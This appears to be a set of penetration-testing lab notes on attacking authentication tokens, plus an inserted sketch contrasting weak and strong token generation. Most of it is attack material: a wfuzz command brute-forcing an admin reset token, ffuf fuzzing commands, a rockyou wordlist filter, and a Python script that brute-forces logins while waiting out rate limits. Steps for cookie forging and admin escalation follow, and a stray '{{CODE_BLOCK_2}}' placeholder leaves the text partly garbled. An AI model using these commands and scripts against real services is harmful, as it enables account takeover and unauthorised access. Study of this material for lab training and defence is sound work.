7.3 Token
Reset Token by Email
Short Token
wfuzz -z range,00000-99999 --ss "Valid" "https://tester.test.test/token.php?user=admin&token=FUZZ"
Weak Cryptography
https://github.com/GeorgeArgyros/Snowflake
https://download.openwall.net/pub/projects/php_mt_seed/
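The seed-recovery tools above work because a token drawn from a seeded PRNG is a pure function of that seed. As an added illustration (not code from this page or from those projects), a Python sketch of a weak, time-seeded token beside its hardened form; weak_token, find_seed, strong_token, token_matches and the timestamp are constructed for the example, and the PRNG is Python's Mersenne Twister standing in for PHP's mt_rand().

```python
import hmac
import random
import secrets
from typing import Optional

# WEAK: a reset token built from a Mersenne Twister PRNG seeded with the
# issue time. PHP's mt_rand() has the same flaw; php_mt_seed recovers the seed.
def weak_token(seed: int, length: int = 8) -> str:
    rng = random.Random(seed)  # deterministic: same seed -> same digits
    return "".join(str(rng.randrange(10)) for _ in range(length))

def find_seed(token: str, approx_time: int, window: int = 60) -> Optional[int]:
    """Show the weakness: if the issue time is known to within `window`
    seconds, the seed (and thus every other token it produced) falls out."""
    for seed in range(approx_time - window, approx_time + window + 1):
        if weak_token(seed, len(token)) == token:
            return seed
    return None

# HARDENED: draw the token from the OS CSPRNG (there is no seed to recover)
# and make it long enough that on-line guessing of the kind wfuzz does above
# is infeasible; compare in constant time so timing leaks nothing.
TOKEN_BYTES = 16  # 128 bits of entropy

def strong_token() -> str:
    return secrets.token_hex(TOKEN_BYTES)

def token_matches(stored: str, supplied: str) -> bool:
    return hmac.compare_digest(stored, supplied)

if __name__ == "__main__":
    issued_at = 1_700_000_000  # constructed timestamp
    t = weak_token(issued_at)
    print("weak token:", t, "seed recovered:", find_seed(t, issued_at + 7))
    s = strong_token()
    print("strong token:", s, "matches:", token_matches(s, s))
```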
Special chars (e.g. &); wordlist:
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/special-chars.txt
wget https://raw.githubusercontent.com/lukes/ISO-3166-Countries-with-Regional-Codes/master/all/all.csv
awk -F "," '{print $4}' all.csv
ffuf -request ./file -w file1:FUZZ1 -w file2:FUZZ2
http://127.0.0.1:8080
ffuf -request ./message.req -request-proto=http -w ./special-chars.txt:FUZZ1 -w ./code.txt:FUZZ2 -replay-proxy http://127.0.0.1:8080
ffuf -request ./message.req -w ./special-chars.txt:FUZZ1 -w ./code.txt:FUZZ2 -request-proto=http
grep '^[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[@$%]' | grep '[0-9]'
# Script
import requests
import time

# Files containing the usernames and passwords (one per line)
username_file = "username.txt"
password_file = "password.txt"

# URL to which we will send the POST request
url = "http://94.237.48.48:54755/login.php"

# Rate limit blocks for 30 seconds
lock_time = 30

# Message that tells us we hit the rate limit
lock_message = "Too many login failures"

# Read and loop through username and password (line N of each file is tried as a pair)
with open(username_file, "r") as user_file, open(password_file, "r") as pass_file:
    for username, password in zip(user_file, pass_file):
        username = username.strip()
        password = password.strip()
        # Prepare POST data
        data = {
            "userid": username,
            "passwd": password,
            "submit": "submit"
        }
        # Make the HTTP POST request
        res = requests.post(url, data=data)
        # Handle generic credential error
        if "Invalid credentials" in res.text:
            print("[-] Invalid credentials: userid:{} passwd:{}".format(username, password))
        # User and password were valid!
        elif "Access granted" in res.text:
            print("[+] Valid credentials: userid:{} passwd:{}".format(username, password))
            break  # Stop the loop once valid credentials are found
        # Hit rate limit, let's say we have to wait 30 seconds
        elif lock_message in res.text:
            print("[-] Hit rate limit, sleeping 30")
            # Sleep for the specified lock time plus an extra 0.5 seconds to be sure
            time.sleep(lock_time + 0.5)
# Script
{{CODE_BLOCK_2}}
Password complexity: grep robots.txt for hints that help narrow down (triangulate) the passwords.
python rate_limit.py
Enumerate all users via the message page; try the supported formats (lowercase country code).
Use CyberChef to decode the cookies (user:role): step 1 decode, step 2 decode, then MD5 hash.
Try all admin.XX users to elevate privileges.